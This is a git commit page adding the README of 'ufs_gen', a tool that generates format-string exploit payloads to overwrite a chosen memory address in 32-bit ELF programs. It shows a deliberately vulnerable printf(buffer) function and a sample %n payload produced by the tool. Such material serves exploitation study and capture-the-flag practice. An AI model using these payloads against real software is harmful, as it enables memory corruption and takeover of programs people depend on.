diff options
author | Olivier Gayot <duskcoder@gmail.com> | 2014-01-26 15:05:01 +0000 |
---|---|---|
committer | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 00:10:11 +0000 |
commit | b3122c208b43e8dd775b49c5023f728e14e0156e (patch) | |
tree | d1fd0d48461e4afa7789fec4f8da5ee9c9f14d90 /README |
initial commit
Diffstat (limited to 'README')
-rw-r--r-- | README | 51 |
1 files changed, 51 insertions, 0 deletions
@@ -0,0 +1,51 @@ +ufs_gen +======= + +This software allows you to generate a payload which may override an address +with the value of your choice. + +The syntax is quite simple: + +There are three parameters needed for the program to run correctly. + +stackidx: this parameter specifies how many dwords you need to access the +beginning of your buffer (or payload). + +override: the address to override + +with: the value to inject at the address overriden + +This software is intended to work with an ELF32 generated by a typical code. + +example: + +int function(const char *payload) +{ + char buffer[BUFSIZ]; + + strncpy(buffer, payload, sizeof(buffer)); + buffer[sizeof(buffer) - 1] = '\0'; + + printf(buffer); + + return 0; +} + +The support of ELF64 and other formats is intended but not written yet. +Although the option 'addrsize' might already be used to specify if an address +is not 4 bytes long, there is very few chances that it would work correctly. + +The support of printf(payload) directly (i.e. without a temporary buffer) is +also planned. + +Example +======= + +user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 +D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n + +License +======= + +This software is free software covered by the GPL license v2. You should +read the COPYING file to understand what is implied. |